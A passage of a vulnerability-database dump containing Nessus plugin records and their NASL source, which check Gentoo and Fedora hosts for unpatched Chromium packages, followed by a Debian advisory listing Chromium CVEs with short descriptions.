\"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-2119\", \"CVE-2021-21191\", \"CVE-2021-21192\", \"CVE-2021-21193\", \"CVE-2021-21194\", \"CVE-2021-21195\", \"CVE-2021-21196\", \"CVE-2021-21197\", \"CVE-2021-21198\", \"CVE-2021-21199\", \"CVE-2021-21201\", \"CVE-2021-21202\", \"CVE-2021-21203\", \"CVE-2021-21204\", \"CVE-2021-21205\", \"CVE-2021-21206\", \"CVE-2021-21207\", \"CVE-2021-21208\", \"CVE-2021-21209\", \"CVE-2021-21210\", \"CVE-2021-21211\", \"CVE-2021-21212\", \"CVE-2021-21213\", \"CVE-2021-21214\", \"CVE-2021-21215\", \"CVE-2021-21216\", \"CVE-2021-21217\", \"CVE-2021-21218\", \"CVE-2021-21219\", \"CVE-2021-21220\", \"CVE-2021-21221\", \"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\", \"CVE-2021-21227\", \"CVE-2021-21228\", \"CVE-2021-21229\", \"CVE-2021-21230\", \"CVE-2021-21231\", \"CVE-2021-21232\", \"CVE-2021-21233\");\n script_xref(name:\"GLSA\", value:\"202104-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0007\");\n\n script_name(english:\"GLSA-202104-08 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202104-08\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202104-08\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-90.0.4430.93'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-90.0.4430.93'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21233\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 90.0.4430.93\"), vulnerable:make_list(\"lt 90.0.4430.93\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 90.0.4430.93\"), vulnerable:make_list(\"lt 90.0.4430.93\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:33:37", "description": "Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and CVE-2019-13721 \n\n----\n\nChromium 78. \n\nFixes these: CVE-2019-5870 CVE-2019-5871 CVE-2019-5872 CVE-2019-5874 CVE-2019-5875 CVE-2019-13691 CVE-2019-13692 CVE-2019-5876 CVE-2019-5877 CVE-2019-5878 CVE-2019-5879 CVE-2019-5880 CVE-2019-5881 CVE-2019-13659 CVE-2019-13660 CVE-2019-13661 CVE-2019-13662 CVE-2019-13663 CVE-2019-13664 CVE-2019-13665 CVE-2019-13666 CVE-2019-13667 CVE-2019-13668 CVE-2019-13669 CVE-2019-13670 CVE-2019-13671 CVE-2019-13673 CVE-2019-13674 CVE-2019-13675 CVE-2019-13676 CVE-2019-13677 CVE-2019-13678 CVE-2019-13679 CVE-2019-13680 CVE-2019-13681 CVE-2019-13682 CVE-2019-13683\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-11-15T00:00:00", "type": "nessus", "title": "Fedora 30 : chromium (2019-2fa7552273)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2019-2FA7552273.NASL", "href": "https://www.tenable.com/plugins/nessus/131037", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-2fa7552273.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(131037);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-13659\", \"CVE-2019-13660\", \"CVE-2019-13661\", \"CVE-2019-13662\", \"CVE-2019-13663\", \"CVE-2019-13664\", \"CVE-2019-13665\", \"CVE-2019-13666\", \"CVE-2019-13667\", \"CVE-2019-13668\", \"CVE-2019-13669\", \"CVE-2019-13670\", \"CVE-2019-13671\", \"CVE-2019-13673\", \"CVE-2019-13674\", \"CVE-2019-13675\", \"CVE-2019-13676\", \"CVE-2019-13677\", \"CVE-2019-13678\", \"CVE-2019-13679\", \"CVE-2019-13680\", \"CVE-2019-13681\", \"CVE-2019-13682\", \"CVE-2019-13683\", \"CVE-2019-13691\", \"CVE-2019-13692\", \"CVE-2019-13720\", \"CVE-2019-13721\", \"CVE-2019-5870\", \"CVE-2019-5871\", \"CVE-2019-5872\", \"CVE-2019-5874\", \"CVE-2019-5875\", \"CVE-2019-5876\", \"CVE-2019-5877\", \"CVE-2019-5878\", \"CVE-2019-5879\", \"CVE-2019-5880\", \"CVE-2019-5881\");\n script_xref(name:\"FEDORA\", value:\"2019-2fa7552273\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Fedora 30 : chromium (2019-2fa7552273)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and\nCVE-2019-13721 \n\n----\n\nChromium 78. \n\nFixes these: CVE-2019-5870 CVE-2019-5871 CVE-2019-5872 CVE-2019-5874\nCVE-2019-5875 CVE-2019-13691 CVE-2019-13692 CVE-2019-5876\nCVE-2019-5877 CVE-2019-5878 CVE-2019-5879 CVE-2019-5880 CVE-2019-5881\nCVE-2019-13659 CVE-2019-13660 CVE-2019-13661 CVE-2019-13662\nCVE-2019-13663 CVE-2019-13664 CVE-2019-13665 CVE-2019-13666\nCVE-2019-13667 CVE-2019-13668 CVE-2019-13669 CVE-2019-13670\nCVE-2019-13671 CVE-2019-13673 CVE-2019-13674 CVE-2019-13675\nCVE-2019-13676 CVE-2019-13677 CVE-2019-13678 CVE-2019-13679\nCVE-2019-13680 CVE-2019-13681 CVE-2019-13682 CVE-2019-13683\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-2fa7552273\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5878\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:30\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^30([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 30\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"chromium-78.0.3904.87-1.fc30\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:32:16", "description": "Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and CVE-2019-13721 \n\n----\n\nChromium 78. \n\nFixes these: CVE-2019-5870 CVE-2019-5871 CVE-2019-5872 CVE-2019-5874 CVE-2019-5875 CVE-2019-13691 CVE-2019-13692 CVE-2019-5876 CVE-2019-5877 CVE-2019-5878 CVE-2019-5879 CVE-2019-5880 CVE-2019-5881 CVE-2019-13659 CVE-2019-13660 CVE-2019-13661 CVE-2019-13662 CVE-2019-13663 CVE-2019-13664 CVE-2019-13665 CVE-2019-13666 CVE-2019-13667 CVE-2019-13668 CVE-2019-13669 CVE-2019-13670 CVE-2019-13671 CVE-2019-13673 CVE-2019-13674 CVE-2019-13675 CVE-2019-13676 CVE-2019-13677 CVE-2019-13678 CVE-2019-13679 CVE-2019-13680 CVE-2019-13681 CVE-2019-13682 CVE-2019-13683\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-11-15T00:00:00", "type": "nessus", "title": "Fedora 29 : chromium (2019-8508d74523)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2019-8508D74523.NASL", "href": "https://www.tenable.com/plugins/nessus/131043", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-8508d74523.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131043);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2019-13659\",\n \"CVE-2019-13660\",\n \"CVE-2019-13661\",\n \"CVE-2019-13662\",\n \"CVE-2019-13663\",\n \"CVE-2019-13664\",\n \"CVE-2019-13665\",\n \"CVE-2019-13666\",\n \"CVE-2019-13667\",\n \"CVE-2019-13668\",\n \"CVE-2019-13669\",\n \"CVE-2019-13670\",\n \"CVE-2019-13671\",\n \"CVE-2019-13673\",\n \"CVE-2019-13674\",\n \"CVE-2019-13675\",\n \"CVE-2019-13676\",\n \"CVE-2019-13677\",\n \"CVE-2019-13678\",\n \"CVE-2019-13679\",\n \"CVE-2019-13680\",\n \"CVE-2019-13681\",\n \"CVE-2019-13682\",\n \"CVE-2019-13683\",\n \"CVE-2019-13691\",\n \"CVE-2019-13692\",\n \"CVE-2019-13720\",\n \"CVE-2019-13721\",\n \"CVE-2019-5870\",\n \"CVE-2019-5871\",\n \"CVE-2019-5872\",\n \"CVE-2019-5874\",\n \"CVE-2019-5875\",\n \"CVE-2019-5876\",\n \"CVE-2019-5877\",\n \"CVE-2019-5878\",\n \"CVE-2019-5879\",\n \"CVE-2019-5880\",\n \"CVE-2019-5881\"\n );\n script_xref(name:\"FEDORA\", value:\"2019-8508d74523\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Fedora 29 : chromium (2019-8508d74523)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and\nCVE-2019-13721 \n\n----\n\nChromium 78. \n\nFixes these: CVE-2019-5870 CVE-2019-5871 CVE-2019-5872 CVE-2019-5874\nCVE-2019-5875 CVE-2019-13691 CVE-2019-13692 CVE-2019-5876\nCVE-2019-5877 CVE-2019-5878 CVE-2019-5879 CVE-2019-5880 CVE-2019-5881\nCVE-2019-13659 CVE-2019-13660 CVE-2019-13661 CVE-2019-13662\nCVE-2019-13663 CVE-2019-13664 CVE-2019-13665 CVE-2019-13666\nCVE-2019-13667 CVE-2019-13668 CVE-2019-13669 CVE-2019-13670\nCVE-2019-13671 CVE-2019-13673 CVE-2019-13674 CVE-2019-13675\nCVE-2019-13676 CVE-2019-13677 CVE-2019-13678 CVE-2019-13679\nCVE-2019-13680 CVE-2019-13681 CVE-2019-13682 CVE-2019-13683\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-8508d74523\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5878\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"chromium-78.0.3904.87-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:31:48", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2019-5869 Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-5870 Guang Gong discovered a use-after-free issue.\n\n - CVE-2019-5871 A buffer overflow issue was discovered in the skia library.\n\n - CVE-2019-5872 Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-5874 James Lee discovered an issue with external Uniform Resource Identifiers.\n\n - CVE-2019-5875 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-5876 Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-5877 Guang Gong discovered an out-of-bounds read issue.\n\n - CVE-2019-5878 Guang Gong discovered an use-after-free issue in the v8 JavaScript library.\n\n - CVE-2019-5879 Jinseo Kim discover that extensions could read files on the local system.\n\n - CVE-2019-5880 Jun Kokatsu discovered a way to bypass the SameSite cookie feature.\n\n - CVE-2019-13659 Lnyas Zhang discovered a URL spoofing issue.\n\n - CVE-2019-13660 Wenxu Wu discovered a user interface error in full screen mode.\n\n - CVE-2019-13661 Wenxu Wu discovered a user interface spoofing issue in full screen mode.\n\n - CVE-2019-13662 David Erceg discovered a way to bypass the Content Security Policy.\n\n - CVE-2019-13663 Lnyas Zhang discovered a way to spoof Internationalized Domain Names.\n\n - CVE-2019-13664 Thomas Shadwell discovered a way to bypass the SameSite cookie feature.\n\n - CVE-2019-13665 Jun Kokatsu discovered a way to bypass the multiple file download protection feature.\n\n - CVE-2019-13666 Tom Van Goethem discovered an information leak.\n\n - CVE-2019-13667 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-13668 David Erceg discovered an information leak.\n\n - CVE-2019-13669 Khalil Zhani discovered an authentication spoofing issue.\n\n - CVE-2019-13670 Guang Gong discovered a memory corruption issue in the v8 JavaScript library.\n\n - CVE-2019-13671 xisigr discovered a user interface error.\n\n - CVE-2019-13673 David Erceg discovered an information leak.\n\n - CVE-2019-13674 Khalil Zhani discovered a way to spoof Internationalized Domain Names.\n\n - CVE-2019-13675 Jun Kokatsu discovered a way to disable extensions.\n\n - CVE-2019-13676 Wenxu Wu discovered an error in a certificate warning.\n\n - CVE-2019-13677 Jun Kokatsu discovered an error in the chrome web store.\n\n - CVE-2019-13678 Ronni Skansing discovered a spoofing issue in the download dialog window.\n\n - CVE-2019-13679 Conrad Irwin discovered that user activation was not required for printing.\n\n - CVE-2019-13680 Thijs Alkamade discovered an IP address spoofing issue.\n\n - CVE-2019-13681 David Erceg discovered a way to bypass download restrictions.\n\n - CVE-2019-13682 Jun Kokatsu discovered a way to bypass the site isolation feature.\n\n - CVE-2019-13683 David Erceg discovered an information leak.\n\n - CVE-2019-13685 Khalil Zhani discovered a use-after-free issue.\n\n - CVE-2019-13686 Brendon discovered a use-after-free issue.\n\n - CVE-2019-13687 Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13688 Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13691 David Erceg discovered a user interface spoofing issue.\n\n - CVE-2019-13692 Jun Kokatsu discovered a way to bypass the Same Origin Policy.\n\n - CVE-2019-13693 Guang Gong discovered a use-after-free issue.\n\n - CVE-2019-13694 banananapenguin discovered a use-after-free issue.\n\n - CVE-2019-13695 Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13696 Guang Gong discovered a use-after-free issue in the v8 JavaScript library.\n\n - CVE-2019-13697 Luan Herrera discovered an information leak.\n\n - CVE-2019-13699 Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13700 Man Yue Mo discovered a buffer overflow issue.\n\n - CVE-2019-13701 David Erceg discovered a URL spoofing issue.\n\n - CVE-2019-13702 Phillip Langlois and Edward Torkington discovered a privilege escalation issue in the installer.\n\n - CVE-2019-13703 Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-13704 Jun Kokatsu discovered a way to bypass the Content Security Policy.\n\n - CVE-2019-13705 Luan Herrera discovered a way to bypass extension permissions.\n\n - CVE-2019-13706 pdknsk discovered an out-of-bounds read issue in the pdfium library.\n\n - CVE-2019-13707 Andrea Palazzo discovered an information leak.\n\n - CVE-2019-13708 Khalil Zhani discovered an authentication spoofing issue.\n\n - CVE-2019-13709 Zhong Zhaochen discovered a way to bypass download restrictions.\n\n - CVE-2019-13710 bernardo.mrod discovered a way to bypass download restrictions.\n\n - CVE-2019-13711 David Erceg discovered an information leak.\n\n - CVE-2019-13713 David Erceg discovered an information leak.\n\n - CVE-2019-13714 Jun Kokatsu discovered an issue with Cascading Style 